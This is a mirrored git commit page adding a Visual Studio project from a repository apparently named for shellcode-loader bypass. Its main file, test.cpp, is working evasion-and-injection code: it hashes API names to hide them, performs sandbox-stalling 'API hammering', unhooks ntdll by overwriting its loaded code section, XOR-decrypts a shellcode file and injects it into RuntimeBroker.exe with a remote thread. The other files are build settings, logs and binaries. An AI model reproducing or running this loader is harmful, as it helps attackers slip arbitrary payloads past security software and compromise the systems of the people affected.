Mirrors_Framework/shellcode_loader_bypass
1
0
Fork 0
mirror of https://github.com/Answerr/shellcode_loader_bypass.git synced 2026-02-06 09:02:25 +08:00
Code Issues Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
jason123
2024-12-11 11:46:31 +08:00
committed by GitHub
parent 5b80815c29
commit 56295618e6
22 changed files with 479 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

263
test/test.cpp Normal file
View File

@@ -0,0 +1,263 @@
#include <windows.h>
#include <tlhelp32.h>
#include <vector>
#include <fstream>
#include <iterator>
#include <winternl.h>
#include <threadpoolapiset.h>
#include <unordered_map>
#include <string>
#pragma comment(lib, "ntdll.lib")
std::unordered_map<DWORD, FARPROC> apiHashTable;
DWORD HashString(const char* str) {
DWORD hash = 0;
while (*str) {
hash = ((hash << 5) + hash) + *str++;
}
return hash;
}
FARPROC ResolveAPI(DWORD hash) {
if (apiHashTable.find(hash) != apiHashTable.end()) {
return apiHashTable[hash];
}
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
if (!hNtdll) return nullptr;
auto pExportDir = reinterpret_cast<PIMAGE_EXPORT_DIRECTORY>(
reinterpret_cast<BYTE*>(hNtdll) +
reinterpret_cast<PIMAGE_NT_HEADERS>(reinterpret_cast<BYTE*>(hNtdll) +
reinterpret_cast<PIMAGE_DOS_HEADER>(hNtdll)->e_lfanew)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
auto pNames = reinterpret_cast<DWORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfNames);
auto pFunctions = reinterpret_cast<DWORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfFunctions);
auto pOrdinals = reinterpret_cast<WORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfNameOrdinals);
for (DWORD i = 0; i < pExportDir->NumberOfNames; ++i) {
const char* apiName = reinterpret_cast<const char*>(reinterpret_cast<BYTE*>(hNtdll) + pNames[i]);
DWORD apiHash = HashString(apiName);
if (apiHash == hash) {
auto proc = reinterpret_cast<FARPROC>(reinterpret_cast<BYTE*>(hNtdll) + pFunctions[pOrdinals[i]]);
apiHashTable[hash] = proc;
return proc;
}
}
return nullptr;
}
void APIHammering() {
for (int i = 0; i < 100; i++) {
LoadLibraryA("kernel32.dll");
LoadLibraryA("user32.dll");
GetModuleHandleA("ntdll.dll");
}
}
void ObfuscateString(std::string& str, unsigned char key) {
for (auto& c : str) {
c ^= key;
}
}
typedef BOOL(WINAPI* LPDSENUMATTRIBUTES)(void* lpShellcode);
void DecryptShellcode(std::vector<unsigned char>& shellcode, unsigned char key) {
for (size_t i = 0; i < shellcode.size(); ++i) {
shellcode[i] ^= key;
}
}
void UnhookNtdll() {
DWORD hashVirtualProtect = HashString("VirtualProtect");
FARPROC pVirtualProtect = ResolveAPI(hashVirtualProtect);
HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
if (!hNtdll) return;
wchar_t systemDir[MAX_PATH] = { 0 };
GetSystemDirectory(systemDir, MAX_PATH);
wchar_t ntdllPath[MAX_PATH] = { 0 };
wcscat_s(ntdllPath, systemDir);
wcscat_s(ntdllPath, L"\ntdll.dll");
HANDLE hFile = CreateFile(ntdllPath, GENERIC_READ, FILE_SHARE_READ, nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, nullptr);
if (hFile == INVALID_HANDLE_VALUE) return;
DWORD fileSize = GetFileSize(hFile, nullptr);
if (fileSize == INVALID_FILE_SIZE) {
CloseHandle(hFile);
return;
}
HANDLE hMapping = CreateFileMapping(hFile, nullptr, PAGE_READONLY, 0, fileSize, nullptr);
if (!hMapping) {
CloseHandle(hFile);
return;
}
void* pFileData = MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0);
if (!pFileData) {
CloseHandle(hMapping);
CloseHandle(hFile);
return;
}
auto pLoadedNtdll = reinterpret_cast<BYTE*>(hNtdll);
auto pDosHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(pFileData);
auto pNtHeaders = reinterpret_cast<PIMAGE_NT_HEADERS>(reinterpret_cast<BYTE*>(pFileData) + pDosHeader->e_lfanew);
auto pSectionHeader = IMAGE_FIRST_SECTION(pNtHeaders);
for (WORD i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++, pSectionHeader++) {
if (!strcmp(reinterpret_cast<char*>(pSectionHeader->Name), ".text")) {
DWORD oldProtect;
reinterpret_cast<BOOL(WINAPI*)(LPVOID, SIZE_T, DWORD, PDWORD)>(pVirtualProtect)(
pLoadedNtdll + pSectionHeader->VirtualAddress,
pSectionHeader->Misc.VirtualSize,
PAGE_EXECUTE_READWRITE,
&oldProtect
);
memcpy(
pLoadedNtdll + pSectionHeader->VirtualAddress,
reinterpret_cast<BYTE*>(pFileData) + pSectionHeader->PointerToRawData,
pSectionHeader->SizeOfRawData
);
reinterpret_cast<BOOL(WINAPI*)(LPVOID, SIZE_T, DWORD, PDWORD)>(pVirtualProtect)(
pLoadedNtdll + pSectionHeader->VirtualAddress,
pSectionHeader->Misc.VirtualSize,
oldProtect,
&oldProtect
);
break;
}
}
UnmapViewOfFile(pFileData);
CloseHandle(hMapping);
CloseHandle(hFile);
}
void ExecuteShellcodeWithThreadpool(const std::vector<unsigned char>& shellcode) {
void* execMemory = VirtualAlloc(
nullptr,
shellcode.size(),
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
if (!execMemory) {
return;
}
memcpy(execMemory, shellcode.data(), shellcode.size());
PTP_WORK work = CreateThreadpoolWork(
[](PTP_CALLBACK_INSTANCE, void* context, PTP_WORK) {
auto shellcodePtr = reinterpret_cast<void(*)()>(context);
shellcodePtr();
},
execMemory,
nullptr
);
if (work) {
SubmitThreadpoolWork(work);
WaitForThreadpoolWorkCallbacks(work, FALSE);
CloseThreadpoolWork(work);
}
VirtualFree(execMemory, 0, MEM_RELEASE);
}
DWORD FindProcessId(const wchar_t* processName) {
PROCESSENTRY32 pe32;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE) {
return 0;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hSnapshot, &pe32)) {
do {
if (!_wcsicmp(pe32.szExeFile, processName)) {
CloseHandle(hSnapshot);
return pe32.th32ProcessID;
}
} while (Process32Next(hSnapshot, &pe32));
}
CloseHandle(hSnapshot);
return 0;
}
void RemoteFunctionStompingInjection(const std::vector<unsigned char>& shellcode) {
DWORD processId = FindProcessId(L"RuntimeBroker.exe");
if (processId == 0) {
return;
}
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, processId);
if (!hProcess) {
return;
}
void* remoteMemory = VirtualAllocEx(hProcess, nullptr, shellcode.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!remoteMemory) {
CloseHandle(hProcess);
return;
}
if (!WriteProcessMemory(hProcess, remoteMemory, shellcode.data(), shellcode.size(), nullptr)) {
VirtualFreeEx(hProcess, remoteMemory, 0, MEM_RELEASE);
CloseHandle(hProcess);
return;
}
HMODULE hModule = GetModuleHandleA("kernel32.dll");
FARPROC loadLibraryAddr = GetProcAddress(hModule, "LoadLibraryA");
HANDLE hThread = CreateRemoteThread(hProcess, nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(remoteMemory), nullptr, 0, nullptr);
if (hThread) {
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
}
VirtualFreeEx(hProcess, remoteMemory, 0, MEM_RELEASE);
CloseHandle(hProcess);
}
int main() {
const char* filename = "shellcode.bin";
const unsigned char key = 0x5A;
APIHammering(); // Add hammering before starting
UnhookNtdll();
std::ifstream file(filename, std::ios::binary);
if (!file.is_open()) {
return -1;
}
std::vector<unsigned char> encryptedShellcode(
(std::istreambuf_iterator<char>(file)),
std::istreambuf_iterator<char>()
);
file.close();
if (encryptedShellcode.empty()) {
return -1;
}
DecryptShellcode(encryptedShellcode, key);
RemoteFunctionStompingInjection(encryptedShellcode);
return 0;
}

31
test/test.sln Normal file
View File

@@ -0,0 +1,31 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.11.35303.130
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "test", "test.vcxproj", "{E178E088-6629-4401-8E22-F7BA9D927D22}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{E178E088-6629-4401-8E22-F7BA9D927D22}.Debug|x64.ActiveCfg = Debug|x64
{E178E088-6629-4401-8E22-F7BA9D927D22}.Debug|x64.Build.0 = Debug|x64
{E178E088-6629-4401-8E22-F7BA9D927D22}.Debug|x86.ActiveCfg = Debug|Win32
{E178E088-6629-4401-8E22-F7BA9D927D22}.Debug|x86.Build.0 = Debug|Win32
{E178E088-6629-4401-8E22-F7BA9D927D22}.Release|x64.ActiveCfg = Release|x64
{E178E088-6629-4401-8E22-F7BA9D927D22}.Release|x64.Build.0 = Release|x64
{E178E088-6629-4401-8E22-F7BA9D927D22}.Release|x86.ActiveCfg = Release|Win32
{E178E088-6629-4401-8E22-F7BA9D927D22}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {7A638454-64BA-4B7F-95DE-878858108F1A}
EndGlobalSection
EndGlobal

135
test/test.vcxproj Normal file
View File

@@ -0,0 +1,135 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>17.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{e178e088-6629-4401-8e22-f7ba9d927d22}</ProjectGuid>
<RootNamespace>test</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="test.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

22
test/test.vcxproj.filters Normal file
View File

@@ -0,0 +1,22 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="test.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
</Project>

4
test/test.vcxproj.user Normal file
View File

@@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

11
test/test/x64/Release/test.exe.recipe Normal file
View File

@@ -0,0 +1,11 @@
<?xml version="1.0" encoding="utf-8"?>
<Project>
<ProjectOutputs>
<ProjectOutput>
<FullPath>C:\Users\Jason\source\repos\test\x64\Release\test.exe</FullPath>
</ProjectOutput>
</ProjectOutputs>
<ContentFiles />
<SatelliteDlls />
<NonRecipeFileRefs />
</Project>

BIN
test/test/x64/Release/test.iobj Normal file
View File

Binary file not shown.

BIN
test/test/x64/Release/test.ipdb Normal file
View File

Binary file not shown.

7
test/test/x64/Release/test.log Normal file
View File

@@ -0,0 +1,7 @@
test.cpp
正在生成代码
3 of 380 functions ( 0.8%) were compiled, the rest were copied from previous compilation.
2 functions were new in current compilation
1 functions had inline decision re-evaluated but remain unchanged
已完成代码的生成
test.vcxproj -> C:\Users\Jason\source\repos\test\x64\Release\test.exe

BIN
test/test/x64/Release/test.obj Normal file
View File

Binary file not shown.

BIN
test/test/x64/Release/test.tlog/CL.command.1.tlog Normal file
View File

Binary file not shown.

BIN
test/test/x64/Release/test.tlog/CL.read.1.tlog Normal file
View File

Binary file not shown.

BIN
test/test/x64/Release/test.tlog/CL.write.1.tlog Normal file
View File

Binary file not shown.

1
test/test/x64/Release/test.tlog/Cl.items.tlog Normal file
View File

@@ -0,0 +1 @@
C:\Users\Jason\source\repos\test\test.cpp;C:\Users\Jason\source\repos\test\test\x64\Release\test.obj

BIN
test/test/x64/Release/test.tlog/link.command.1.tlog Normal file
View File

Binary file not shown.

BIN
test/test/x64/Release/test.tlog/link.read.1.tlog Normal file
View File

Binary file not shown.

3
test/test/x64/Release/test.tlog/link.secondary.1.tlog Normal file
View File

@@ -0,0 +1,3 @@
^C:\USERS\JASON\SOURCE\REPOS\TEST\TEST\X64\RELEASE\TEST.OBJ
C:\Users\Jason\source\repos\test\test\x64\Release\test.IPDB
C:\Users\Jason\source\repos\test\test\x64\Release\test.iobj

BIN
test/test/x64/Release/test.tlog/link.write.1.tlog Normal file
View File

Binary file not shown.

2
test/test/x64/Release/test.tlog/test.lastbuildstate Normal file
View File

@@ -0,0 +1,2 @@
PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.41.34120:TargetPlatformVersion=10.0.22621.0:
Release|x64|C:\Users\Jason\source\repos\test\|

BIN
test/test/x64/Release/vc143.pdb Normal file
View File

Binary file not shown.

BIN
test/x64/Release/test.exe Normal file
View File

Binary file not shown.

BIN
test/x64/Release/test.pdb Normal file
View File

Binary file not shown.